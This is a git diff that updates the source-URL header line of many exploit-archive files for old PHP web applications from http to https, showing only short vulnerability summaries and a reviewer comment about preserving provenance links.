@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17763/info +source: https://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27787.txt b/exploits/php/webapps/27787.txt index 779224d80..dd7e5bbe6 100644 --- a/exploits/php/webapps/27787.txt +++ b/exploits/php/webapps/27787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17765/info +source: https://www.securityfocus.com/bid/17765/info MaxTrade is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27788.txt b/exploits/php/webapps/27788.txt index 72863a023..bca1d1731 100644 --- a/exploits/php/webapps/27788.txt +++ b/exploits/php/webapps/27788.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17766/info +source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27789.txt b/exploits/php/webapps/27789.txt index 3d63595c3..3769b9a42 100644 --- a/exploits/php/webapps/27789.txt +++ b/exploits/php/webapps/27789.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17766/info +source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27792.txt b/exploits/php/webapps/27792.txt index 946abb09d..9db85755f 100644 --- a/exploits/php/webapps/27792.txt +++ b/exploits/php/webapps/27792.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17770/info +source: https://www.securityfocus.com/bid/17770/info SunShop Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27793.txt b/exploits/php/webapps/27793.txt index c40874f2f..5c82a996b 100644 --- a/exploits/php/webapps/27793.txt +++ b/exploits/php/webapps/27793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17774/info +source: https://www.securityfocus.com/bid/17774/info Collaborative Portal Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27794.txt b/exploits/php/webapps/27794.txt index 2e0c680de..a2694a4df 100644 --- a/exploits/php/webapps/27794.txt +++ b/exploits/php/webapps/27794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17778/info +source: https://www.securityfocus.com/bid/17778/info JSBoard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27795.txt b/exploits/php/webapps/27795.txt index 3f120c48a..0881fda09 100644 --- a/exploits/php/webapps/27795.txt +++ b/exploits/php/webapps/27795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17779/info +source: https://www.securityfocus.com/bid/17779/info Zenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27796.txt b/exploits/php/webapps/27796.txt index 2a6fce263..d451a2e89 100644 --- a/exploits/php/webapps/27796.txt +++ b/exploits/php/webapps/27796.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17779/info +source: https://www.securityfocus.com/bid/17779/info Zenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27797.txt b/exploits/php/webapps/27797.txt index 915f94271..e3136c4ad 100644 --- a/exploits/php/webapps/27797.txt +++ b/exploits/php/webapps/27797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17781/info +source: https://www.securityfocus.com/bid/17781/info XDT Pro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27798.txt b/exploits/php/webapps/27798.txt index 8b458c41a..ca0502158 100644 --- a/exploits/php/webapps/27798.txt +++ b/exploits/php/webapps/27798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17784/info +source: https://www.securityfocus.com/bid/17784/info GeoBlog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27799.txt b/exploits/php/webapps/27799.txt index bd7bea9f5..fb20397b0 100644 --- a/exploits/php/webapps/27799.txt +++ b/exploits/php/webapps/27799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17790/info +source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27800.txt b/exploits/php/webapps/27800.txt index 9538aaa4d..5f6b801ee 100644 --- a/exploits/php/webapps/27800.txt +++ b/exploits/php/webapps/27800.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17794/info +source: https://www.securityfocus.com/bid/17794/info Pinnacle Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27803.txt b/exploits/php/webapps/27803.txt index ceb55fa69..edb00a0be 100644 --- a/exploits/php/webapps/27803.txt +++ b/exploits/php/webapps/27803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17812/info +source: https://www.securityfocus.com/bid/17812/info PhP-Gallery is prone to an information-disclosure vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27804.txt b/exploits/php/webapps/27804.txt index b35b133b1..f971d90ca 100644 --- a/exploits/php/webapps/27804.txt +++ b/exploits/php/webapps/27804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17812/info +source: https://www.securityfocus.com/bid/17812/info PhP-Gallery is prone to an information-disclosure vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27807.txt b/exploits/php/webapps/27807.txt index 04db80885..63d332f9d 100644 --- a/exploits/php/webapps/27807.txt +++ b/exploits/php/webapps/27807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17819/info +source: https://www.securityfocus.com/bid/17819/info Fast Click SQL Lite is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27808.txt b/exploits/php/webapps/27808.txt index c7dc1cad8..92dd9a68c 100644 --- a/exploits/php/webapps/27808.txt +++ b/exploits/php/webapps/27808.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17821/info +source: https://www.securityfocus.com/bid/17821/info Pacheckbook is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27809.txt b/exploits/php/webapps/27809.txt index 5cb88a10a..673832c6e 100644 --- a/exploits/php/webapps/27809.txt +++ b/exploits/php/webapps/27809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17823/info +source: https://www.securityfocus.com/bid/17823/info MyNews is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27810.txt b/exploits/php/webapps/27810.txt index 286afee86..2382deff3 100644 --- a/exploits/php/webapps/27810.txt +++ b/exploits/php/webapps/27810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17826/info +source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27811.txt b/exploits/php/webapps/27811.txt index f5b6f34f9..97cb699f7 100644 --- a/exploits/php/webapps/27811.txt +++ b/exploits/php/webapps/27811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17826/info +source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27812.txt b/exploits/php/webapps/27812.txt index b3b8f3a57..52f881b4d 100644 --- a/exploits/php/webapps/27812.txt +++ b/exploits/php/webapps/27812.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17828/info +source: https://www.securityfocus.com/bid/17828/info PHP Linkliste is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27818.txt b/exploits/php/webapps/27818.txt index 6945022a3..05ba5f674 100644 --- a/exploits/php/webapps/27818.txt +++ b/exploits/php/webapps/27818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17839/info +source: https://www.securityfocus.com/bid/17839/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27819.txt b/exploits/php/webapps/27819.txt index b2f926822..c2117e90a 100644 --- a/exploits/php/webapps/27819.txt +++ b/exploits/php/webapps/27819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17850/info +source: https://www.securityfocus.com/bid/17850/info CuteNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27821.html b/exploits/php/webapps/27821.html index 3b589f7f7..ea42d87af 100644 --- a/exploits/php/webapps/27821.html +++ b/exploits/php/webapps/27821.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17860/info +source: https://www.securityfocus.com/bid/17860/info OpenFAQ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27822.txt b/exploits/php/webapps/27822.txt index 08155d8fa..9d10bdab7 100644 --- a/exploits/php/webapps/27822.txt +++ b/exploits/php/webapps/27822.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17865/info +source: https://www.securityfocus.com/bid/17865/info MyBloggie is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27823.txt b/exploits/php/webapps/27823.txt index 8a901b487..97f7c7069 100644 --- a/exploits/php/webapps/27823.txt +++ b/exploits/php/webapps/27823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17871/info +source: https://www.securityfocus.com/bid/17871/info openEngine is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27824.txt b/exploits/php/webapps/27824.txt index 70544f317..783556542 100644 --- a/exploits/php/webapps/27824.txt +++ b/exploits/php/webapps/27824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17874/info +source: https://www.securityfocus.com/bid/17874/info The 'singapore' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27829.txt b/exploits/php/webapps/27829.txt index 62af244a9..bc4bc6c64 100644 --- a/exploits/php/webapps/27829.txt +++ b/exploits/php/webapps/27829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17878/info +source: https://www.securityfocus.com/bid/17878/info Phil's Bookmark script is prone to an authentication-bypass vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/php/webapps/27831.txt b/exploits/php/webapps/27831.txt index e5288cedf..62b1a6ed3 100644 --- a/exploits/php/webapps/27831.txt +++ b/exploits/php/webapps/27831.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27832.txt b/exploits/php/webapps/27832.txt index f1b568f34..ff8f0d1ef 100644 --- a/exploits/php/webapps/27832.txt +++ b/exploits/php/webapps/27832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27833.txt b/exploits/php/webapps/27833.txt index e4d464d95..095ad4320 100644 --- a/exploits/php/webapps/27833.txt +++ b/exploits/php/webapps/27833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27834.txt b/exploits/php/webapps/27834.txt index 216ad2070..b2ccefec0 100644 --- a/exploits/php/webapps/27834.txt +++ b/exploits/php/webapps/27834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27835.txt b/exploits/php/webapps/27835.txt index 1b22f8a67..4fe23bc32 100644 
--- a/exploits/php/webapps/27835.txt +++ b/exploits/php/webapps/27835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27836.txt b/exploits/php/webapps/27836.txt index 95690327f..fc9db6245 100644 --- a/exploits/php/webapps/27836.txt +++ b/exploits/php/webapps/27836.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27837.txt b/exploits/php/webapps/27837.txt index c063a83e7..63bd3637c 100644 --- a/exploits/php/webapps/27837.txt +++ b/exploits/php/webapps/27837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17893/info +source: https://www.securityfocus.com/bid/17893/info evoTopsite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27838.txt b/exploits/php/webapps/27838.txt index a27a86763..f48457872 100644 --- a/exploits/php/webapps/27838.txt +++ b/exploits/php/webapps/27838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. 
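Review bot: The `+source:` line at line 1 records only a live URL, and in the 27831.txt through 27836.txt hunks that one URL (`https://www.securityfocus.com/bid/17890/info`) is the only reference shown for six separate files. If that page moves, all six lose their provenance within the lines shown here. Since the commit already touches every one of these header lines, consider adding a second header line with an archived copy or a retrieval date, so the reference survives independently of the upstream site.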
diff --git a/exploits/php/webapps/27839.txt b/exploits/php/webapps/27839.txt index 948ee4457..be4e4ff3f 100644 --- a/exploits/php/webapps/27839.txt +++ b/exploits/php/webapps/27839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27840.txt b/exploits/php/webapps/27840.txt index 21d2a8b8c..263c4a34f 100644 --- a/exploits/php/webapps/27840.txt +++ b/exploits/php/webapps/27840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27841.txt b/exploits/php/webapps/27841.txt index 7aa655c5c..22fe3fdbc 100644 --- a/exploits/php/webapps/27841.txt +++ b/exploits/php/webapps/27841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27843.txt b/exploits/php/webapps/27843.txt index 144179bd6..d12c6bd83 100644 --- a/exploits/php/webapps/27843.txt +++ b/exploits/php/webapps/27843.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17904/info +source: https://www.securityfocus.com/bid/17904/info MyBB is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27845.php b/exploits/php/webapps/27845.php index 9332187e4..e622af96b 100644 --- a/exploits/php/webapps/27845.php +++ b/exploits/php/webapps/27845.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17909/info +source: https://www.securityfocus.com/bid/17909/info ISPConfig is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27848.txt b/exploits/php/webapps/27848.txt index 7aefa3b91..e7cb20081 100644 --- a/exploits/php/webapps/27848.txt +++ b/exploits/php/webapps/27848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17911/info +source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27855.txt b/exploits/php/webapps/27855.txt index b8b65940a..3f386ace5 100644 --- a/exploits/php/webapps/27855.txt +++ b/exploits/php/webapps/27855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17949/info +source: https://www.securityfocus.com/bid/17949/info Vizra is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27857.txt b/exploits/php/webapps/27857.txt index 050b974eb..ec7625b5d 100644 --- a/exploits/php/webapps/27857.txt +++ b/exploits/php/webapps/27857.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17952/info +source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27858.txt b/exploits/php/webapps/27858.txt index 0f843a169..e17318e00 100644 --- a/exploits/php/webapps/27858.txt +++ b/exploits/php/webapps/27858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17952/info +source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27859.txt b/exploits/php/webapps/27859.txt index fb9c91909..0a8fb21d5 100644 --- a/exploits/php/webapps/27859.txt +++ b/exploits/php/webapps/27859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17954/info +source: https://www.securityfocus.com/bid/17954/info OZJournals is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27863.txt b/exploits/php/webapps/27863.txt index 6ea74c81c..fca0888c5 100644 --- a/exploits/php/webapps/27863.txt +++ b/exploits/php/webapps/27863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17965/info +source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. diff --git a/exploits/php/webapps/27864.txt b/exploits/php/webapps/27864.txt index 486d21011..0b377f6de 100644 --- a/exploits/php/webapps/27864.txt +++ b/exploits/php/webapps/27864.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27865.txt b/exploits/php/webapps/27865.txt index 1e610052f..b1dcaaf80 100644 --- a/exploits/php/webapps/27865.txt +++ b/exploits/php/webapps/27865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27866.txt b/exploits/php/webapps/27866.txt index ab112c51d..004ceeaf1 100644 --- a/exploits/php/webapps/27866.txt +++ b/exploits/php/webapps/27866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27867.txt b/exploits/php/webapps/27867.txt index 9043af426..3dd476475 100644 --- a/exploits/php/webapps/27867.txt +++ b/exploits/php/webapps/27867.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27868.txt b/exploits/php/webapps/27868.txt index 5fdabf96a..9a7364bf9 100644 --- a/exploits/php/webapps/27868.txt +++ b/exploits/php/webapps/27868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17970/info +source: https://www.securityfocus.com/bid/17970/info Pixaria PopPhoto is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27869.txt b/exploits/php/webapps/27869.txt index abaa2faad..4c41056ec 100644 --- a/exploits/php/webapps/27869.txt +++ b/exploits/php/webapps/27869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17974/info +source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27870.txt b/exploits/php/webapps/27870.txt index 89e77a075..19a3ce742 100644 --- a/exploits/php/webapps/27870.txt +++ b/exploits/php/webapps/27870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17974/info +source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/27880.pl b/exploits/php/webapps/27880.pl index 6750f2ec6..ca2b6da97 100755 --- a/exploits/php/webapps/27880.pl +++ b/exploits/php/webapps/27880.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17975/info +source: https://www.securityfocus.com/bid/17975/info RadLance is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27881.txt b/exploits/php/webapps/27881.txt index dcad4f6f7..d6b5b366c 100644 --- a/exploits/php/webapps/27881.txt +++ b/exploits/php/webapps/27881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17976/info +source: https://www.securityfocus.com/bid/17976/info phpODP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27883.txt b/exploits/php/webapps/27883.txt index e7b6b54f7..6bc483712 100644 --- a/exploits/php/webapps/27883.txt +++ b/exploits/php/webapps/27883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17983/info +source: https://www.securityfocus.com/bid/17983/info MonoChat is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27884.txt b/exploits/php/webapps/27884.txt index 3cc6e45fb..adabd9a84 100644 --- a/exploits/php/webapps/27884.txt +++ b/exploits/php/webapps/27884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17984/info +source: https://www.securityfocus.com/bid/17984/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27885.txt b/exploits/php/webapps/27885.txt index 3e35d3b75..a1cfea744 100644 --- a/exploits/php/webapps/27885.txt 
+++ b/exploits/php/webapps/27885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17994/info +source: https://www.securityfocus.com/bid/17994/info PhpRemoteView is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27886.txt b/exploits/php/webapps/27886.txt index 17334ca44..51f7c5b9e 100644 --- a/exploits/php/webapps/27886.txt +++ b/exploits/php/webapps/27886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17997/info +source: https://www.securityfocus.com/bid/17997/info Sphider is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27889.txt b/exploits/php/webapps/27889.txt index d6388e3b9..738f47372 100644 --- a/exploits/php/webapps/27889.txt +++ b/exploits/php/webapps/27889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18012/info +source: https://www.securityfocus.com/bid/18012/info BoastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27899.txt b/exploits/php/webapps/27899.txt index 0bd93302a..bccabd76a 100644 --- a/exploits/php/webapps/27899.txt +++ b/exploits/php/webapps/27899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18041/info +source: https://www.securityfocus.com/bid/18041/info DownloadControl is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27900.txt b/exploits/php/webapps/27900.txt index d47da7b8c..c3393061f 100644 --- a/exploits/php/webapps/27900.txt +++ b/exploits/php/webapps/27900.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18047/info +source: https://www.securityfocus.com/bid/18047/info Artmedic Newsletter is prone to a remote PHP code-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27904.txt b/exploits/php/webapps/27904.txt index a2bfd3217..9910a1691 100644 --- a/exploits/php/webapps/27904.txt +++ b/exploits/php/webapps/27904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18109/info +source: https://www.securityfocus.com/bid/18109/info Docebo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27905.txt b/exploits/php/webapps/27905.txt index 044a4e1ff..2d5e7bb65 100644 --- a/exploits/php/webapps/27905.txt +++ b/exploits/php/webapps/27905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18110/info +source: https://www.securityfocus.com/bid/18110/info DoceboLMS is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27907.txt b/exploits/php/webapps/27907.txt index 4fa591dfb..08b9a25c0 100644 --- a/exploits/php/webapps/27907.txt +++ b/exploits/php/webapps/27907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18117/info +source: https://www.securityfocus.com/bid/18117/info SaPHPLesson is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27908.txt b/exploits/php/webapps/27908.txt index edd82c9d6..6e7052652 100644 --- a/exploits/php/webapps/27908.txt +++ b/exploits/php/webapps/27908.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18118/info +source: https://www.securityfocus.com/bid/18118/info Chipmunk Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27909.txt b/exploits/php/webapps/27909.txt index 508e4d0a5..dc54c15b3 100644 --- a/exploits/php/webapps/27909.txt +++ b/exploits/php/webapps/27909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18119/info +source: https://www.securityfocus.com/bid/18119/info Chipmunk Directory is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27910.txt b/exploits/php/webapps/27910.txt index d38676d23..ac204cb0f 100644 --- a/exploits/php/webapps/27910.txt +++ b/exploits/php/webapps/27910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18120/info +source: https://www.securityfocus.com/bid/18120/info AR-Blog is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27911.txt b/exploits/php/webapps/27911.txt index 1ee3b7a66..2281d2931 100644 --- a/exploits/php/webapps/27911.txt +++ b/exploits/php/webapps/27911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18122/info +source: https://www.securityfocus.com/bid/18122/info vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27912.txt 